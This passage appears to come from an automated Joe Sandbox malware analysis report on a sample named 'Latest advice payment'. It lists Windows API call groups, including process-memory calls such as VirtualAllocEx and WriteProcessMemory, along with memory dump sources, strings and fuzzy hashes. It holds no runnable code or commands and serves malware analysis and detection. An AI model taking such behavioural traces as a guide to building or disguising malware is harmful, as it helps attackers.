• GetPixel.GDI32(00000000,?,00000003), ref: 005D5ACD
• ReleaseDC.USER32(00000000,00000003), ref: 005D5B08
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0056134D
• SelectObject.GDI32(?,00000000), ref: 0056135C
• BeginPath.GDI32(?), ref: 00561373
• SelectObject.GDI32(?,00000000), ref: 0056139C
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 005C4ABA
• __beginthreadex.LIBCMT ref: 005C4AD8
• MessageBoxW.USER32(?,?,?,?), ref: 005C4AED
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 005C4B03
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005C4B0A
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
• String ID:
• API String ID: 3824534824-0
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005B821E
• GetLastError.KERNEL32(?,005B7CE2,?,?,?), ref: 005B8228
• GetProcessHeap.KERNEL32(00000008,?,?,005B7CE2,?,?,?), ref: 005B8237
• HeapAlloc.KERNEL32(00000000,?,005B7CE2,?,?,?), ref: 005B823E
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005B8255
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
APIs
• CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?,?,005B7455), ref: 005B7127
• ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?), ref: 005B7142
• lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?), ref: 005B7150
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?), ref: 005B7160
• CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?), ref: 005B716C
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: fae22f5b3fe642653c18e57f3502c2cdeedd4e60fd9bfefec1a4850b62daf6a1
                                                            • Instruction ID: 957d23fafff2e3f2d0b3dc7e54ff1e8a2f19e45305ae1b96a58a7a0e6c105050
                                                            • Opcode Fuzzy Hash: fae22f5b3fe642653c18e57f3502c2cdeedd4e60fd9bfefec1a4850b62daf6a1
                                                            • Instruction Fuzzy Hash: AB0171B2605208ABDB154F68DC84AAA7FADFB88751F144064FD44D6210DB31ED40E7A0
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005C5260
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 005C526E
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 005C5276
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 005C5280
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005C52BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 5c135d5f48288fc59ddf28b2cb0ea9ae4b54f5af9f409a56ad25e30ddcbc5280
                                                            • Instruction ID: d04d2334db55db57f80ce2441b33c8e00712e1213cf00747855774ed5fbc83d0
                                                            • Opcode Fuzzy Hash: 5c135d5f48288fc59ddf28b2cb0ea9ae4b54f5af9f409a56ad25e30ddcbc5280
                                                            • Instruction Fuzzy Hash: 53015B35D01A1DDBDF04DFE4E888AEDBBB8BB59311F400459E981B6140DF706594D7A1
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005B8121
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005B812B
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005B813A
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005B8141
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005B8157
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 7beeae12e11cb9264086af367376cc27f3f6e44d19b75579486d53b996ab16f0
                                                            • Instruction ID: fdd5ed9961cb12f2814b36df6aef742b85476cde2d0572b246dbc62272416860
                                                            • Opcode Fuzzy Hash: 7beeae12e11cb9264086af367376cc27f3f6e44d19b75579486d53b996ab16f0
                                                            • Instruction Fuzzy Hash: 09F03171201344AFD7150F65DCC8EB73BACFF89654B000025F58596150CE619945EB60
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 005BC1F7
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 005BC20E
                                                            • MessageBeep.USER32(00000000), ref: 005BC226
                                                            • KillTimer.USER32(?,0000040A), ref: 005BC242
                                                            • EndDialog.USER32(?,00000001), ref: 005BC25C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: bea9014d1075337bdbdc3fbcda7f48da452782de2a744f72da35bb078aa1af24
                                                            • Instruction ID: 945ee8821ff22b8d785e04a175b82fcc2a6ef7c80e2529473975ba5c76f13c77
                                                            • Opcode Fuzzy Hash: bea9014d1075337bdbdc3fbcda7f48da452782de2a744f72da35bb078aa1af24
                                                            • Instruction Fuzzy Hash: 0201A234404304ABEB245B60ED8EB96BFB8FB10B06F000669A5C2A54E0DBF079489B94
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 005613BF
                                                            • StrokeAndFillPath.GDI32(?,?,0059B888,00000000,?), ref: 005613DB
                                                            • SelectObject.GDI32(?,00000000), ref: 005613EE
                                                            • DeleteObject.GDI32 ref: 00561401
                                                            • StrokePath.GDI32(?), ref: 0056141C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: 7c5a15294b25ce17ce8918c6fff5192913b1889bfc9ed812b61b3407673d81a8
                                                            • Instruction ID: 3f3ff1382d385b60614ec5346c7f1a8fd5b6346b6654a47f639291d42a494e74
                                                            • Opcode Fuzzy Hash: 7c5a15294b25ce17ce8918c6fff5192913b1889bfc9ed812b61b3407673d81a8
                                                            • Instruction Fuzzy Hash: 6EF01930010F49EBDB355F26EC8C7683FA6B710326F089225E46B4A0F1CB79499AEF14
                                                            APIs
                                                              • Part of subcall function 00580DB6: std::exception::exception.LIBCMT ref: 00580DEC
                                                              • Part of subcall function 00580DB6: __CxxThrowException@8.LIBCMT ref: 00580E01
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 00567A51: _memmove.LIBCMT ref: 00567AAB
                                                            • __swprintf.LIBCMT ref: 00572ECD
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00572D66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: 9b6fa554b2d7405df5755ef5eed89b6bd369c9a6b2d1849ac70037c39d75ae08
                                                            • Instruction ID: e8a995b9d2600066f2de85a3da38ed004672e9ecc1061c091904fa663b22c14a
                                                            • Opcode Fuzzy Hash: 9b6fa554b2d7405df5755ef5eed89b6bd369c9a6b2d1849ac70037c39d75ae08
                                                            • Instruction Fuzzy Hash: B1914B711082169FC714EF24D899C7EBFA8FF95710F04891DF8969B2A1EA30ED44DB62
                                                            APIs
                                                              • Part of subcall function 00564750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00564743,?,?,005637AE,?), ref: 00564770
                                                            • CoInitialize.OLE32(00000000), ref: 005CB9BB
                                                            • CoCreateInstance.OLE32(005F2D6C,00000000,00000001,005F2BDC,?), ref: 005CB9D4
                                                            • CoUninitialize.OLE32 ref: 005CB9F1
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                            • String ID: .lnk
                                                            • API String ID: 2126378814-24824748
                                                            • Opcode ID: cd38592b405de634744a4b578a03289275689b41496167f719b2bf2f8d65a604
                                                            • Instruction ID: b06fc75dd164e3b2bbbe418fa7a611de0b11bef8cf4c10102aa56e11c144b6a1
                                                            • Opcode Fuzzy Hash: cd38592b405de634744a4b578a03289275689b41496167f719b2bf2f8d65a604
                                                            • Instruction Fuzzy Hash: F8A143756042069FDB00DF54C885E6ABBE9FF89314F048998F8999B3A1CB31ED46CB91
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 005BB4BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container$%_
                                                            • API String ID: 3565006973-162890803
                                                            • Opcode ID: 6973225da18c206b0c572df94fdcaa5d6ca7c055b4f73de5a5e60ddf84e56767
                                                            • Instruction ID: b57220d1a5dbf3895a6f695e8ca79949ba0cbd88599f86746c232edca6a7c98f
                                                            • Opcode Fuzzy Hash: 6973225da18c206b0c572df94fdcaa5d6ca7c055b4f73de5a5e60ddf84e56767
                                                            • Instruction Fuzzy Hash: 4E913C70600601AFEB64DF64C884BAABBF5FF49710F24856DF946CB291EBB1E841CB50
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 005850AD
                                                              • Part of subcall function 005900F0: __87except.LIBCMT ref: 0059012B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: 5bd1ad895c36d202c91672aa9bff50113c23c0d845fd19adefcb985738e0d224
                                                            • Instruction ID: e704bf5b098215ba089ee49a271e5b2803e44d820480b92d27efa90036c3e96c
                                                            • Opcode Fuzzy Hash: 5bd1ad895c36d202c91672aa9bff50113c23c0d845fd19adefcb985738e0d224
                                                            • Instruction Fuzzy Hash: A9512525A08606CADF117724CD0937E2F94BB80700F249D59E8D5962E9FF388DD8EB86
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: 3cW$_W
                                                            • API String ID: 4104443479-1067530677
                                                            • Opcode ID: 530d2c689b4578e949f9eb7fcf3b938da0075b01f97a678b51eaaebe3bae92bc
                                                            • Instruction ID: 441727cbe9ab7ac0036a9adf93986eda377ec654a01ce782415de56eeeca7bf2
                                                            • Opcode Fuzzy Hash: 530d2c689b4578e949f9eb7fcf3b938da0075b01f97a678b51eaaebe3bae92bc
                                                            • Instruction Fuzzy Hash: 7D5168B0E006199FCB64CF68D884ABEBBF1FF45304F24852AE85AD7250EB30A955CF51
                                                            APIs
                                                              • Part of subcall function 005C14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005B9296,?,?,00000034,00000800,?,00000034), ref: 005C14E6
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 005B983F
                                                              • Part of subcall function 005C1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005B92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 005C14B1
                                                              • Part of subcall function 005C13DE: GetWindowThreadProcessId.USER32(?,?), ref: 005C1409
                                                              • Part of subcall function 005C13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,005B925A,00000034,?,?,00001004,00000000,00000000), ref: 005C1419
                                                              • Part of subcall function 005C13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,005B925A,00000034,?,?,00001004,00000000,00000000), ref: 005C142F
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005B98AC
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005B98F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: b74fe09f3dacd11eb9f63184a5c5af7a2cd5156f8bd6fb1a2a917ecba4bab89c
                                                            • Instruction ID: cd57f1308e8b57ca5da4df1f3862436a647943f60e859b0634afbb18576b815e
                                                            • Opcode Fuzzy Hash: b74fe09f3dacd11eb9f63184a5c5af7a2cd5156f8bd6fb1a2a917ecba4bab89c
                                                            • Instruction Fuzzy Hash: D8414C76900219AFDB14DFA4CD85EDEBBB8FB4A700F004099FA45B7191DA716E45CBA0
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,005EF910,00000000,?,?,?,?), ref: 005E79DF
                                                            • GetWindowLongW.USER32 ref: 005E79FC
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005E7A0C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 1864ec6c1941a5a751b737709deeae81a4a62f6b55a6bab4f16846db7174645b
                                                            • Instruction ID: 7c1251ddf5523eeaf989d6bec23470709d6e59dfbe6f6d62c96c9bf336e51951
                                                            • Opcode Fuzzy Hash: 1864ec6c1941a5a751b737709deeae81a4a62f6b55a6bab4f16846db7174645b
                                                            • Instruction Fuzzy Hash: 1931F23120464AABDB288F35CC45BEA7BA9FF48324F204725F8B5D32E1D730E8509B50
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 005E7461
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 005E7475
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 005E7499
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: 0457603d4045eb097942d4979ff1f199e5a46d752f350fcbe4b28e705147ed95
                                                            • Instruction ID: 30c854ba0fbe446c25994eae29b0776a8bdfae304032461b1f959a227f158b3d
                                                            • Opcode Fuzzy Hash: 0457603d4045eb097942d4979ff1f199e5a46d752f350fcbe4b28e705147ed95
                                                            • Instruction Fuzzy Hash: 1221E132100259ABDF258E94CC46FEA3F7AFB4C724F110214FE556B1D0DA75AC909BA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 005E7C4A
                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 005E7C58
                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005E7C5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DestroyWindow
                                                            • String ID: msctls_updown32
                                                            • API String ID: 4014797782-2298589950
                                                            • Opcode ID: 62f2b1fca698d8fe811839a8a6145dfc6ce58a11de6bacfbb297fba5b5e747ee
                                                            • Instruction ID: c77f06d68ea19fdb4f79942c0b9dbcc8f0ab7d73c0cf91523c3c477de7b86c07
                                                            • Opcode Fuzzy Hash: 62f2b1fca698d8fe811839a8a6145dfc6ce58a11de6bacfbb297fba5b5e747ee
                                                            • Instruction Fuzzy Hash: 5F219CB1604649AFEB24DF24DCC5CA73BADFB4A354B140459F9559B2A1CB31EC018B60
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 005E6D3B
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 005E6D4B
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 005E6D70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: f5aadd2d431c442a9f19904f8f3f8013466a43dbff1a580443b04514b5e052be
                                                            • Instruction ID: 6984e00cf676850ea7dc8bdd770ed35da2c6fef33a0aa7ececfb69402587f809
                                                            • Opcode Fuzzy Hash: f5aadd2d431c442a9f19904f8f3f8013466a43dbff1a580443b04514b5e052be
                                                            • Instruction Fuzzy Hash: 8621F232200158BFDF298F55CC85EBB3BBAFF997A0F118124F9849B1A0CA719C5187A0
                                                            APIs
                                                            • __snwprintf.LIBCMT ref: 005D3A66
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            Strings
                                                            Memory Dump Source
